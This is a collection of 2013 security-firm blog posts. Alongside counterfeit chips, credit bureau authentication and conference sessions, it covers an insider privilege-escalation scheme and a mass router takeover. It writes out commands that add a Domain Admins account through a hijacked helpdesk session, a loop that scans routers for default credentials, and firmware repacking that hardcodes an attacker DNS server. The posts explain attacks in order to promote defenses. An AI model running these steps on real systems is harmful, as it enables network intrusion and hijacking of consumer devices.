INSIGHTS | April 10, 2013

What Would MacGyver Do?

“The great thing about a map: it gets you in and out of places in a lot of different ways.” – MacGyver

When I was young I was a big fan of the American TV show, MacGyver. Every week I tuned in to see how MacGyver would build some truly incredible things with very basic and unexpected materials — even if some of his solutions were hard to believe. For example, in one episode MacGyver built a futuristic motorized heat-seeking gun using only a set of batteries, an electric mixer, a rubber band, a serving cart, and half a suit of armor.

From that time on I always kept the “What would MacGyver do?” spirit in my thinking. Then again, I think I was “destined” to be an IT guy, and particularly one in the security field, where we don’t have quite the same variety of materials to craft our solutions.

But the “What would MacGyver do?” frame of mind helped me figure out a simple, MacGyver-style way to completely “own” a network environment using just a small set of ingredients:

  • Exploiting a bad use of tools.
  • A small piece of social engineering.
  • Some creativity.
  • A small number of manual configuration changes.

I’ll relate how I lucked into this opportunity, how easy it can be to exploit certain circumstances, and especially how easy it would be to use a similar technique to gain domain administrator access for a company network.

The whole situation was due to the way helpdesk support was provided at the company I was working for. For security reasons non-administrative domain users were prevented from installing software on their desktops. So when I tried to install a small software application I received a very respectful “access denied” message. I felt a bit annoyed by this but still wanted my application, so I called the helpdesk and asked them to finish the installation remotely for me.

The helpdesk person was amenable, so I gave him my machine name and soon saw a pop-up window indicating that someone had connected to my machine and was interacting with my desktop.

My first impression was “Oh cool, this helpdesk is responsive and soon my software will be installed and I can finally start my project.”

But when I thought about this a bit more I started to wonder how the helpdesk person could install my software since he was trying to do so with my user privileges and desktop session rather than logging me out and connecting as an administrator.

And here we arrive at our first Act.

Act #1: Bad use of tools

Everything became clear when the helpdesk guy emulated a Ctrl+Alt+Delete combination that brings up the Windows menu and its awesome Switch User option. 

The helpdesk guy clicked the Switch User option and here I saw some magic — namely the support guy logging in right before my eyes with the local Administrator account.

Picture this: the support guy was typing in the password directly in front of my eyes. Even though I am an IT guy this was the first time I ever saw a support person interacting live with the Windows login screen. I wished I could see or intercept the password, but unfortunately I only saw ugly black dots in the password dialog box.

At that moment I felt frustrated, because I realized how close I was to having the local administrator password. But how could I get it?

The magic became clearer when the support guy logged in as an administrator on the machine and I was able to see him interacting with the desktop. That really made my day.

And then something even more magnificent happened while I was watching: for some undefined reason the support guy encountered a Windows session error. He had no choice but to log out, which he did, and then he logged in again with the Domain Administrator account … again right before my eyes!

(I don’t have a domain lab set up right now, so I can’t duplicate the screen image, but I am sure you can imagine the login window, which would look just like the one above except that it would include the domain name.)

When he logged in as the domain administrator I saw another nice desktop and the helpdesk guy interacting with my machine right in front of my eyes as the domain admin.

This is when I had a devious idea: while this guy was installing my software I nudged my mouse a millimeter, and the pointer moved. At this point we arrive at the second Act.

Act #2: Some MacGyver magic

I asked myself, what if I did the following:

  • Unplug the network cable (I could have taken control of the mouse instead, but that would have aroused suspicion).
  • Stop the DameWare service that is providing access to the support guy.
  • Reconnect the network cable.
  • Create a new domain admin account (possible because the domain administrator session is the one active on my computer).
  • Restart the DameWare service.
  • Log out of the machine.
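For concreteness, here is a rough sketch of what those six steps might look like from a command prompt inside that hijacked session. The service name, account name, and password are placeholders of mine, not details from the actual incident:

rem Step 1: unplug the network cable by hand
rem Step 2: stop the remote-control service (name is a placeholder for the DameWare service)
net stop dwmrcs
rem Step 3: plug the network cable back in
rem Step 4: create a new domain account and promote it to Domain Admins
net user macgyver N3wP@ss123 /add /domain
net group "Domain Admins" macgyver /add /domain
rem Step 5: restart the remote-control service
net start dwmrcs
rem Step 6: log out
logoff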

By completing these six steps, which wouldn’t take more than two minutes, I could have assumed domain administrator privileges for the entire company.
Let’s recap the formula for this awesome sauce:

1. Bad use of tools: It was totally wrong for the help desk person to open a domain admin session directly under the user’s eyes, giving him the opportunity to take control of the session.

2. A small piece of social engineering: Just call the support desk and ask them to install some software for you. 

3. A small amount of finagling on your part: When the help desk person logs in, use the following steps to push him to log in as Domain Admin (the password change is sketched just after this list):

     •      Unplug the network cable (1 second).
     •      Change the local administrator password (7 seconds).
     •      Log out (2 seconds).
     •      Plug the network cable back in (1 second).
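For reference, that password change is a one-liner at an elevated command prompt; the new password here is just a placeholder:

net user Administrator N3wP@ss123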

4. Another small piece of social engineering: Call the support person back and blame Microsoft Windows for a crash. Cross your fingers that after he is unable to log in as local admin (because you changed the password) he will instead log in as a domain administrator.

5. Some more finagling on your part: Do the same steps defined in step 3 to create a new domain admin account.

6. Success: Enjoy being a domain administrator for the company.


Final Act: Conclusion

At the beginning of my IT security career I was a bit skeptical of the magic of social engineering. But through the years I have learned that social engineering still works and always will. Even if the social engineering involves the tiniest and most basic request, combine it with some imagination and you can own a huge company. And if you are conducting a pentest you don’t always have to rely exclusively on your technical expertise. You can draw on your imagination and creativity to build a powerful weapon using small and basic tools … just like MacGyver.
INSIGHTS | April 2, 2013

Spotting Fake Chips in the Supply Chain

In the information security world we tend to focus upon vulnerabilities that affect the application and network architecture layers of the enterprise and, every so often, some notable physical devices. Through various interrogatory methods we can typically uncover any vulnerabilities that may be present and, through discussion with the affected business units, derive a relative statement of risk to the business as a whole.

An area of business rarely dissected from an information security perspective however is the supply chain. For manufacturing companies and industrial suppliers, nothing is more critical to their continued business success than maintaining the integrity and reliability of their supply chain. For some industries – such as computer assembly or truck fabrication facilities – even the smallest hiccup in their just-in-time ordering system can result in entire assembly lines being gummed up and product not being rolled out the front door.

The traditional approach to identifying vulnerabilities within the supply chain is largely a paper-based audit process, sometimes topped and tailed with a security assessment of the PC-based systems involved. Rarely (if ever) are the manufacturing machines and associated industrial control systems included in physical assessments or penetration tests, for fear of disrupting the just-in-time manufacturing line.

Outside the scope of information security assessments, and often beyond the capabilities of automated quality assurance practices on an organization’s assembly line, lies the frailty of falling victim to a third-party supplier’s tainted supply chain.

For example, let’s look at a common microprocessor ordered through a tainted supply chain.

Dissecting an ST19XT34 Microprocessor

In early 2012 samples of the ST ST19XT34 were ordered from https://us.hkinventory.com/.  The ST19XT34 is a secure microprocessor designed for very large volume and cost-effective secure portable applications (such as smartcards used within Chip&PIN technologies). The ST19X platform includes an internal Modular Arithmetic Processor (MAP) and DES accelerator – designed to speed up cryptographic calculations using Public Key Algorithms and Secret Key Algorithms.

The ST19XT34 chips that IOActive were charged to investigate were encapsulated within a standard SOIC package and were supposed to have 34 KB of EEPROM.

Upon visual analysis the devices appeared to be correct.  However, after decapsulation, it was clear that the parts provided were not what had been ordered.

In the above image we have a ‘fake’ ST19XT34 on the left and a sample of the genuine chip on the right. It is almost impossible to tell that the left device was altered unless you have a known original part.

After decapsulation it was easy to immediately recognize the difference between the two SOIC parts. The ‘fake’ device on the left was actually an ST ST19AF08, while the genuine ST19XT34 is on the right.

The ST19AF08 is a 600 nanometer, 3-metal device (on the left). It contains an 8 KB EEPROM.

The ST19XT34 is a 350 nanometer, 3-metal device (on the right). It contains a 34 KB EEPROM, making the die much larger than that of the older, smaller device.

Microprocessor Supply Chain Frailty

As the example above clearly shows, it is often very difficult to identify a tainted supply chain. An X-ray inspection would have verified the integrity of the supplier in this case, had it been part of the quality assurance process, but it would not detect more subtle modifications to the supplied microprocessors.

If it is so easy to taint the supply chain and introduce fraudulently marked microprocessors, how hard is it to insert less obvious – more insidious – changes to the chips? For example, what if a batch of ST19XT34 chips had been modified to weaken the DES/triple-DES capabilities of the chip, or perhaps the random number generator was rigged with a more predictable pseudo random algorithm – such that an organized crime unit or government entity could trivially decode communications or replay transactions?

The frailty of today’s supply chain is a genuine concern for many. The capability of organized crime and foreign government entities to include backdoors, add malicious code, or subvert “secure” routines within fake or counterfeit microprocessors is not a science fiction story, but something that can occur today. The ability to inject these modified chips into the supply chain of any global manufacturer of goods is, quite frankly, trivial.

The cost of entry for organized criminals and government entities to undertake this kind of manipulation of the supply chain is high, but well within their financial capabilities – and, more importantly, they could reap great rewards from their investment. 

Identifying a tainted supply chain is not a simple task. It requires specialized equipment capable of dissecting microprocessors at the nanometer scale, fiddly extraction of microcode, and skilled security analysts to sift through the code looking for backdoors and deliberate weaknesses in the algorithms. 

It’s an expensive and time-consuming proposition – but it is fast becoming a critical component of assuring that today’s smartphones, Chip&PIN technologies, and critical infrastructure control systems aren’t subject to organized subversion.

INSIGHTS | March 28, 2013

Behind ADSL Lines: How to Bankrupt ISPs While Making Money

Disclaimer: No businesses or even the Internet were harmed while researching this post. We will explore how an attacker can control the Internet access of one or more ISPs or countries through ordinary routers and Internet modems.

Cyber-attacks are hardly new in 2013. But what if an attack is both incredibly easy to construct and yet persistent enough to shut Internet services down for a few hours or even days? In this blog post we will talk about how easy it would be to enlist ordinary home Internet connections in this kind of attack, and then we suggest some potentially straightforward solutions to this problem.
The first problem
The Internet in the last 10 to 20 years has become the most pervasive way to communicate and share news on the planet. Today even people who are not at all technical and who do not love technology still use their computers and Internet-connected devices to share pictures, news, and almost everything else imaginable with friends and acquaintances.
All of these computers and devices are connected via CPE (customer premises equipment) such as routers, modems, and set-top boxes that enable consumers to connect to the Internet. Although most people consider these CPEs to be little magic boxes that need no provisioning, in fact these plug-and-play devices are a key, yet weak, link behind many major attacks occurring across the web today.
These little magic boxes come with some nifty default features:
  • Updateable firmware.
  • Default passwords.
  • Port forwarding.
  • Accessibility over http or telnet.
 
The second problem
All ISPs across the world share a common flaw. Look at the following screen shot and think about how one might leverage this flaw.
Most ISPs that own one or more netblocks write meaningful whois descriptions that provide some insight into what those netblocks are used for.
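You can reproduce what the screenshot shows with a plain whois lookup; a quick sketch, using a documentation address rather than a real ISP:

whois 198.51.100.1 | grep -iE 'netname|descr'

The netname and descr fields routinely spell out things like “ADSL pool” or “DSL subscribers”, which is exactly the insight an attacker wants.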
Attack phase 1
So what could an attacker do with this data?
  1. They can gather a lot of information about the netblocks of one or more ISPs, or even entire countries, and some information about their use from http://bgp.he.net and http://ipinfodb.com.
  2. Next, they can use whois or parse bgp.he.net to search for additional information about these netblocks, such as data about ADSL, DSL, Wi-Fi, Internet users, and so on.
  3. Finally, the attacker can convert the matched netblocks into IP addresses.
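As a sketch of step 3: once a netblock of interest has been identified, expanding it into individual addresses is a one-liner. nmap’s list-scan mode does this without sending a single probe (the netblock here is a documentation range, not a real target):

nmap -sL -n 203.0.113.0/24 | awk '/Nmap scan report/{print $NF}' > targets.txt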
At this point the attacker could have:
  • Identified netblocks for an entire ISP or country.
  • Pinpointed a lot of ADSL networks, so they have minimized the effort required to scan the entire Internet. With a database gathered and sorted by ISP and country, an attacker can, if they want to, target a specific ISP or country.
Next the attacker can test how many CPEs he can identify in a short space of time to see whether this attack would be worth pursuing:
A few hours later the results are in:

In this case the attacker has identified more than 400,000 CPEs that are potentially vulnerable to the simplest of attacks, which is to scan the CPEs using both telnet and http for their default passwords.
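To give a feel for how little sophistication this takes, a throwaway shell loop along the following lines would test each candidate address for a web interface that still accepts a common vendor default such as admin/admin. The file names and credentials are assumptions for the sake of the sketch:

while read ip; do
  # an HTTP 200 with default credentials strongly suggests an exposed CPE
  code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 3 -u admin:admin "http://$ip/")
  [ "$code" = "200" ] && echo "$ip" >> open_cpes.txt
done < targets.txt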
We can illustrate the attacker’s plan with a simple diagram:

Attack Phase 2 (Command Persistence) 
Widely available tools such as binwalk, firmware-mod-kit, and Unix dd make it possible to modify firmware and gain persistent control over CPEs. And obtaining firmware for routers is relatively easy. There are several options:
  1. The router is supported by dd-wrt (http://dd-wrt.com)
  2. The attacker either works at an ISP or has a friend who works at an ISP and happens to have easy access to assorted firmware.
  3. Search engines and dorks.
As soon as the attacker is comfortable with his reverse-engineered and modified firmware images he can categorize them by CPE model and match them to the realm string received from each CPE under attack. In fact, with a bit of tinkering an attacker can automate this process completely, including the ability to upload the new firmware to the CPEs he has targeted. Once installed, even a factory reset will not remove his control over that CPE.
The firmware modifications that would be of value to an attacker include, but are not limited to, the following (a sketch of the repacking workflow follows this list):
  • Hardcoded DNS servers.
  • New IP table rules that work well on dd-wrt-supported CPEs.
  • Remove the Upload New Firmware page.
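As a rough sketch of how the repacking step might work with firmware-mod-kit, assuming a squashfs-based image and using a hardcoded DNS server as the example modification (the file names and the DNS address are illustrative):

./extract-firmware.sh stock_cpe_firmware.bin                   # unpack the image into fmk/rootfs
echo 'nameserver 198.51.100.53' > fmk/rootfs/etc/resolv.conf   # point the CPE at a resolver the attacker controls
./build-firmware.sh                                            # repack; the new image is written under fmk/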
CPE attack phase recap
  1. An attacker gathers a country’s netblocks.
  2. He filters ADSL networks.
  3. He reverse engineers and modifies firmware.
  4. He scans ranges and uploads the modified firmware to targeted CPEs.
Follow-up attack scenarios
If an attacker is able to successfully compromise a large number of CPEs with the relatively simple attack described above, what can he do for a follow-up?
  • ISP attack: Let’s say an ISP has a large number of IP addresses vulnerable to the CPE compromise attack and an attacker modifies the firmware settings on all the ADSL routers on one or more of the ISP’s netblocks. Most ISP customers are not technical, so when their router is unable to connect to the Internet the first thing they will do is contact the ISP’s Call Center. Will the Call Center be able to handle the sudden spike in the number of calls? How many customers will be left on hold? And what if this happens every day for a week, two weeks or even a month? And if the firmware on these CPEs is unfixable through the Help Desk, they may have to replace all of the damaged CPEs, which becomes an extremely costly affair for the company.
  • Controlling traffic: If an attacker controls a huge number of CPEs and their DNS settings, being able to manipulate website traffic rankings will be quite trivial. The attacker can also redirect traffic that was supposed to go to a certain site or search engine to another site or search engine or anywhere else that comes to mind. (And as suggested before, the attacker can shut down the Internet for all of these users for a very long time.)
  • Company reputations: An attacker can post:
    • False news on cloned websites.
    • A fake marketing campaign on an organization’s website.
  • Make money: An attacker can redirect all traffic from the compromised CPEs to his ads and make money from the resulting impressions. An attacker can also add auto-clickers to his attack to further enhance his revenue potential.
  • Exposing machines behind NAT: An attacker can take it a step further by using port forwarding to expose all PCs behind a router, which would further increase the attack’s potential impact from CPEs to the computers connected to those CPEs.
  • Launch DDoS attacks: Since the attacker can control traffic from thousands of CPEs to the Internet he can direct large amounts of traffic at a desired victim as part of a DDoS attack.
  • Attack ISP service management engines, Radius, and LDAP: Every time a CPE is restarted a new session is requested; if an attacker restarts enough of an ISP’s CPEs at once he can cause Radius, LDAP, and other ISP services to fail.
  • Disconnect a country from the Internet: If a country’s ISPs do not protect against the kind of attack we have described an entire country could be disconnected from the Internet until the problem is resolved.
  • Stealing credentials: This is nothing new. If DNS records are totally in the control of an attacker, they can clone a few key social networking or banking sites and from there steal all the credentials they want.
In the end it would be almost impossible to take back control of all the CPEs that were compromised through the attack strategies described above. The only way an ISP could recover from this kind of incident would be to make all their subscribers buy new modems or routers, or alternatively provide them with new ones.
Solutions
There are two parts to solving this problem: fixes from the CPE vendors and fixes from the ISPs.
Vendor solution: 
Vendors should stop releasing CPEs that have only rudimentary and superficial default passwords. When a router is being installed on a user’s premises the user should be required to change the administrator password to a random value before the CPE becomes fully functional.
ISP solutions: 
Let’s look at a normal flow of how a user receives his IP address from an ISP:
  1. The subscriber turns on his home router or modem, which sends an authentication request to the ISP.
  2. ISP network devices handle the request and forward it to Radius to check the authentication data.
  3. The Radius Server sends Access-Accept or Access-Reject messages back to the network device.
  4. If the Access-Accept message is valid, DHCP assigns an IP to the subscriber and the subscriber is now able to access the Internet.
However, this is how we think this process should change:
  1. Before the subscriber receives an IP from DHCP the ISP should check the settings on the CPE.
  2. If the router or modem is using the default settings, the ISP should continue to block the subscriber from accessing the Internet. Instead of allowing access, the ISP should redirect the subscriber to a web page with the message “You May Be At Risk: Consult your manual and update your device or call our help desk to assist you.”
  3. Another way of doing this on the ISP side is to filter at the Broadband Remote Access Server (BRAS) routers at the customer edge; an ACL could deny incoming traffic on ports including, but not limited to, 80, 443, 23, 21, 8000, and 8080 (a sketch follows this list).
  4. ISPs on international gateways should deny access to the above ports from the Internet to their ADSL ranges.
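As a rough illustration of points 3 and 4, a Cisco-style ACL applied at the BRAS or international gateway might look like the following; the ADSL range shown is a documentation prefix, and exact syntax varies by platform:

access-list 110 deny tcp any 198.51.100.0 0.0.0.255 eq 23
access-list 110 deny tcp any 198.51.100.0 0.0.0.255 eq 80
access-list 110 deny tcp any 198.51.100.0 0.0.0.255 eq 443
access-list 110 deny tcp any 198.51.100.0 0.0.0.255 eq 8080
access-list 110 permit ip any any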
Detecting attacks
ISPs should be detecting these types of attacks. Rather than placing sensors all over the ISP’s network, the simplest way to detect attacks and grab evidence is to lure such attackers into a honeypot. Sensors would be a waste of money and require too much administrative overhead, so let’s focus on one server:
  1. Take a few unused ADSL /24 subnets: x.x.x.0/24, x.x.y.0/24, and so on.
 
  2. Configure the server to be a sensor: a simple telnet server and a simple Apache server with htpasswd set up as admin/admin on the web server’s root directory would suffice.
  3. On the router that sits in front of the server, configure static routes that look something like this:
route x.x.x.0/24 next-hop <server-ip>;
route x.x.y.0/24 next-hop <server-ip>;
route x.x.z.0/24 next-hop <server-ip>;
  4. Redistribute your static routes into BGP to advertise them, so that anyone who scans or connects to any IP in the above subnets is redirected to your server.
 
  5. On the server side (it should probably be a Linux server) apply iptables rules like the following:
iptables -t nat -A PREROUTING -p tcp -d x.x.x.0/24 --dport 23 -j DNAT --to <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.y.0/24 --dport 23 -j DNAT --to <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.z.0/24 --dport 23 -j DNAT --to <server-ip>:24
 
  6. Configure the server’s honeypot to listen on port 24; the logs can then be attributed to the x.x.(x|y|z).0/24 subnets instead of the server itself.
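The listener in step 6 can be trivially simple. Here is a sketch using ncat; the banner text and log path are arbitrary choices of mine:

ncat -lk --sh-exec 'printf "login: "; read u; printf "Password: "; read p; echo "$(date) $u/$p" >> /var/log/adsl-honeypot.log' 24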
Conclusion
The Internet is about traffic from a source to a destination, and most of it is generated by users. If users cannot reach their destinations the Internet is useless. ISPs should make sure their end users are secure, and users should demand that their ISPs implement rules to keep them secure. At the same time, vendors should come up with a way to securely provision their CPEs before they are connected to the Internet by forcing owners to create non-dictionary/random usernames and passwords for these devices.
INSIGHTS | March 14, 2013

Credit Bureau Data Breaches

This week saw some considerable surprise over how easy it is to acquire personal credit report information. On Tuesday Bloomberg News led with a story of how “Top Credit Agencies Say Hackers Stole Celebrity Reports”, and yesterday there were many follow-up stories examining the hack. In one story I spoke with Rob Westervelt over at CRN regarding the problems credit reporting agencies face when authenticating the person to whom the credit information applies and the additional problems they face securing the data in general (you can read the article “Equifax, Other Credit Bureaus Acknowledge Data Breach”).

Many stories have focused on one of two areas – the celebrities, or the ease of acquiring credit reports – but I wanted to touch upon some of the problems credit monitoring agencies face in verifying who has access to the data and how that fits into the bigger problem of Internet-based authentication and the prevalence of personal-enough information.
The repeated failure of Internet portals tasked with providing access to personal credit report information stems from the data they have available that can be used for authentication, and the legislated requirement to make the data available in the first place.
Credit monitoring agencies are required to make the data accessible to all the individuals they hold reports on; however, access to the credit report information is achieved through a wide variety of free and subscription portals, most of which are not associated with the credit monitoring bureaus in the first place.
In order to provide access to a particular individual’s credit report, the user must answer a few questions about themselves via one such portal. These questions, by necessity, are restricted to the kinds of data held (and tracked) by the credit reporting agencies – based on information garnered from other financial institutions. This information includes name, date of birth (or age), social security number, account numbers, account balances, account addresses, the financial institutions that manage the accounts, and past requests for access to credit report information. While it sounds like a lot of information, it’s actually not a very rich source for authentication purposes – especially when some of the most important information that can uniquely identify the individual is relatively easy to acquire through other external and Internet-based sources.
Time Magazine’s article “Hackers Now Aiming For Your Credit Reports” of a year ago describes many of these limitations and where some of this information can be acquired. In essence though, the data is easy to mine from social media sites and household tax records, and a little brute-force guessing can overcome the hurdle of it not already being in the public domain.
The question then becomes “what can the credit monitoring agencies do to protect the privacy of credit reports?” Some commentators have recommended that individuals should provide a copy of state-issued identification documents – such as a driver’s license or passport.
The submission of such a scanned document poses new problems for the credit monitoring agencies. First of all, this probably isn’t automatable on a large scale and they’ll need trained staff to review each of these documents. Secondly, there are plenty of tools and websites that allow you to generate a fake ID within seconds – and spotting the fakes will be extremely difficult without tying the authentication process to an external government authentication system (e.g. checking to see if the drivers license or passport number is legitimate). Thirdly, do you want the credit reporting agencies holding even more personal information about you?
This entire problem is getting worse – not just for the credit monitoring agencies, but for all online services. Authentication – especially “first time” authentication – is difficult at the best of times, but if you’re trying to do this using only data an organization has collected and holds themselves, it’s nigh on impossible given current hacking techniques.
I hate to say it, but there’s a very strong (and growing) requirement for governments to play a larger role in identity management. Someone somewhere needs to act as a trusted Internet passport authority – with “trusted” being the critical piece. I’ve seen the arguments that have been made for Facebook, Google, etc. being that identity management platform, but I respectfully disagree. These commercial services aren’t identity management platforms, they’re authentication gateways. What is needed is the cyber-equivalent of a government-issued passport, with all the checks and balances that entails.
Even that is not perfect, but it would certainly be better than the crummy vendor-specific authentication systems and password recovery processes that currently plague the Internet.
In the meantime, don’t be surprised if you find your credit report and other personal information splattered over the Internet as part of some juvenile doxing attack.
— Gunter Ollmann, CTO IOActive Inc.
INSIGHTS | February 25, 2013

IOAsis at RSA 2013

RSA has grown significantly in the 10 years I’ve been attending, and this year’s edition looks to be another great event. With many great talks and networking events, tradeshows can be a whirlwind of quick hellos, forgotten names, and aching feet. For years I would return home from RSA feeling as if I hadn’t sat down in a week and lamenting all the conversations I started but never had the chance to finish. So a few years ago during my annual pre-RSA Vitamin D-boosting trip to a warm beach an idea came to me: Just as the beach served as my oasis before RSA, wouldn’t it be great to give our VIPs an oasis to escape to during RSA? And thus the first IOAsis was born.


Aside from feeding people and offering much needed massages, the IOAsis is designed to give you a trusted environment to relax and have meaningful conversations with all the wonderful folks that RSA, and the surrounding events such as BSidesSF, CSA, and AGC, attract. To help get the conversations going each year we host a number of sessions where you can join IOActive’s experts, customers, and friends to discuss some of the industry’s hottest topics. We want these to be as interactive as possible, so the following is a brief look inside some of the sessions the IOActive team will be leading.

 

(You can check out the full IOAsis schedule of events at:

Chris Valasek @nudehaberdasher

Hi everyone, Chris Valasek here. I just wanted to let everyone know that I will be participating in a panel in the RSA 2013 Hackers & Threats track (Session Code: HT-R31) on Feb 28 at 8:00 a.m. The other panelists and I will be giving our thoughts on the current state of attacks, malware, governance, and protections, which will hopefully give attendees insight into how we as security professionals perceive the modern threat landscape. I think it will be fun because of our varied perspectives on security and the numerous security breaches that occurred in 2012.

Second, Stephan Chenette and I will be talking about assessing modern attacks against PCs at IOAsis on Wednesday at 1:00-1:45. We believe that security is too often described in binary terms (“Either you ARE secure or you are NOT secure”) when computer security is not an either/or proposition. We will examine current mainstream attack techniques, how we plan non-binary security assessments, and finally why we think changes in methodologies are needed. I’d love people to attend either presentation and chat with me afterwards. See everyone at RSA 2013!

By Gunter Ollmann @gollmann

My RSA talk (Wednesday at 11:20), “Building a Better APT Package,” will cover some of the darker secrets involved in the types of weaponized malware that we see in more advanced persistent threats. In particular I’ll discuss the way payloads are configured and tested to bypass the layers of defensive strata used by security-savvy victims. While most “advanced” features of APT packages are not very different from those produced by commodity malware vendors, there are nuances to the remote control features and levels of abstraction in more advanced malware that are designed to make complete attribution more difficult.

Over in the IOAsis refuge on Wednesday at 4:00 I will be leading a session with my good friend Bob Burls on “Fatal Mistakes in Incident Response.” Bob recently retired from the London Metropolitan Police Cybercrime Division, where he led investigations of many important cybercrimes and helped put the perpetrators behind bars. In this session Bob will discuss several complexities of modern cybercrime investigations and provide tips, gotchas, and lessons learned from his work alongside corporate incident response teams. By better understanding how law enforcement works, corporate security teams can be more successful in engaging with them and receive the attention and support they believe they need.

By Stephan Chenette @StephanChenette

At IOAsis this year Chris Valasek and I will be presenting on a topic that builds on my Offensive Defense talk and starts a discussion about what we can do about it.

For too long both Chris and I have witnessed the “old school security mentality” that revolves solely around chasing vulnerabilities and remediation of vulnerable machines to determine risk.  In many cases the key motivation is regulatory compliance. But this sort of mind-set doesn’t work when you are trying to stop a persistent attacker.

What happens after the user clicks a link or a zero-day attack exploits a vulnerability to gain entry into your network? Is that part of the risk assessment you have planned for? Have you only considered defending the gates of your network? You need to think about the entire attack vector: Reconnaissance, weaponization, delivery, exploitation, installation of malware, and command and control of the infected asset are all strategies that need further consideration by security professionals. Have you given sufficient thought to the motives and objectives of the attackers and the techniques they are using? Remember, even if an attacker is able to get into your network, as long as they aren’t able to destroy or remove critical data, the overall damage is limited.

Chris and I are working on an R&D project that we hope will shake up how the industry thinks about offensive security by enabling us to automatically create non-invasive scenarios to test your holistic security architecture and the controls within them. Do you want those controls to be tested for the first time in a real-attack scenario, or would you rather be able to perform simulations of various realistic attacker scenarios, replayed in an automated way producing actionable and prioritized items?

Our research and deep understanding of hacker techniques enables us to catalog various attack scenarios and replay them against your network, testing your security infrastructure and controls to determine how susceptible you are to today’s attacks. Join us on Wednesday at 1:00 to discuss this project and help shape its future.

By Tiago Asumpcao @coconuthaxor

At RSA I will participate in a panel reviewing the history of mobile security. It will be an opportunity to discuss the paths taken by the market as a whole, and an opportunity to debate the failures and victories of individual vendors.

Exploit mitigations, application stores and mobile malware, the wave of jail-breaking, and MDM: hear the latest from the folks who spend their days and nights wrestling with modern smartphone platforms. While all members of the panel share a general experience within the mobile world, every individual brings a unique relationship with at least one major mobile industry player, giving the Mobile Security Battle Royale a touch of spice.

At IOAsis on Tuesday at 2:00 I will present on the problem of malware in application stores and on privacy in mobile phones. I will talk about why it is difficult to automate malware analysis in an efficient way, and what can and cannot be done. From a privacy perspective, how can the user keep both their personal data and the enterprise’s assets separate from each other and secure within such a dynamic universe? To the enterprise, which is the biggest threat: malicious apps, remote attacks, or lost devices?
I will raise a lot of technical and strategic questions. I may not be able to answer them all, but it should make for lively and thought-provoking discussion.

By Chris Tarnovsky @semiconduktor
I will be discussing the inherent risks of reduced instruction set computer (RISC) processors vs. complex instruction set computer (CISC) processors at IOAsis on Tuesday at 12:00.

Many of today’s smart cards favor RISC architectures, ARM, AVR, and CalmRisc16 being the most popular versions seen in smartcards. Although these processors provide high performance, they pose a trade-off from a security perspective.

The vendors of these devices offer security in the form of sensors, active meshing, and encrypted (scrambled) memory contents. Yet from a low-level perspective an attacker still has an easy way to block branch operations, which makes it possible to address the device’s entire memory map.

To prevent branches on an AVR and CalmRisc16 an attacker only needs to cut and strap the highest bit to a ‘0’. After doing so the branch instruction is impossible to execute. An instruction that should have been a branch will become something else without the branch effect, allowing an attacker to sit on the bus using only one to two micro-probing needles.

On the other hand, CPU architectures such as 8051 or 6805 are not susceptible to such attacks. In these cases modifying a bus is much more complicated and would require a full bus width of edits.

I look forward to meeting everyone!
INSIGHTS | February 4, 2013

2012 Vulnerability Disclosure Retrospective

Vulnerabilities, the bugbear of system administrators and security analysts alike, keep on piling up – ruining Friday nights and weekends around the world as those tasked with fixing them work against ever shortening patch deadlines.

In recent years the burden of patching vulnerable software may have felt like it was lessening; and it was, if you go by the annual number of vulnerabilities publicly disclosed. However, if you thought 2012 was a little more intense than the previous half-decade, you’ll probably not be surprised to learn that last year bucked the downward trend and saw a rather big jump – 26% over 2011 – all according to the latest analyst brief from NSS Labs, “Vulnerability Threat Trends: A Decade in Review, Transition on the Way”.

Rather than summarize the fascinating brief from NSS Labs with a list of recycled bullet points, I’d encourage you to read it yourself and to view the fascinating video they constructed that depicts the rate and diversity of vulnerability disclosures throughout 2012 (see the video – “The Evolution of 2012 Vulnerability Disclosures by Vendor”).

I was particularly interested in the Industrial Control System (ICS/SCADA) vulnerability growth – a six-fold increase since 2010! Granted, of the 5,225 vulnerabilities publicly disclosed and tracked in 2012 only 124 (2.4 percent) were ICS/SCADA related, but it’s still noteworthy – especially since I suspect very few vulnerabilities in this field are ever disclosed publicly.

Once you’ve read the NSS Labs brief and digested the statistics, let me tell you why the numbers don’t really matter and why the ranking of vulnerable vendors is a bit like ranking car manufacturers by the number of red cars they sold last year.

A decade ago, as security software and appliance vendors battled for customer dollars, vulnerability numbers mattered. It was a yardstick of how well one security product (and vendor) was performing against another – a kind of “my IDS detects 87% of high risk vulnerabilities” discussion. When the number of vulnerability disclosures kept on increasing and the cost of researching and developing detection signatures kept going up, yet the price customers were willing to pay in maintenance fees for their precious protection technologies was going down, much of the discussion then moved to ranking and scoring vulnerabilities… and the Common Vulnerability Scoring System (CVSS) was devised.

CVSS changed the nature of the game. It became less about covering a specific percentage of vulnerabilities and more about covering the most critical and exploitable. The ‘High, Medium, and Low’ of old, got augmented with a formal scoring system and a bevy of new labels such as ‘Critical’ and ‘Highly Critical’ (which, incidentally, makes my teeth hurt as I grind them at the absurdity of that term). Rather than simply shuffling everything to the right, with the decade old ‘Medium’ becoming the new ‘Low’, and the old ‘Low’ becoming a shrug and a sensible “if you can be bothered!”… we ended up with ‘High’ being “important, fix immediately”, then ‘Critical’ assuming the role of “seriously, you need to fix this one first!”, and ‘Highly Critical’ basically meaning “Doh! The Mayans were right, the world really is going to end!”

But I digress. The crux of the matter as to why annual vulnerability statistics don’t matter, and will continue to matter less in a practical sense as time goes by, is that they only reflect ‘disclosures’. In essence, for a vulnerability to be counted (and attribution applied) it must be publicly disclosed, and more people are finding it advantageous not to do that.

Vulnerability markets and bug purchase programs – white, gray, and black – have changed the incentive to disclose publicly, as well as limiting the level of information that is made available at the time of disclosure. Furthermore, the growing professionalization of bug hunting has meant that vulnerability discoveries are valuable commercial commodities – opening doors to new consulting engagements and potential employment with the vulnerable vendor. Plus there’s a bunch of other lesser reasons why public disclosures (as a percentage of actual vulnerabilities found by bug hunters and reported to vendors) will go down.

The biggest reason why vulnerability disclosure numbers matter less and less to an organization (and those charged with protecting it) is that the software landscape has fundamentally changed. The CVSS approach was primarily designed for software that was bought, installed, and operated by multiple organizations – i.e., software packages that could be patched by their many owners.

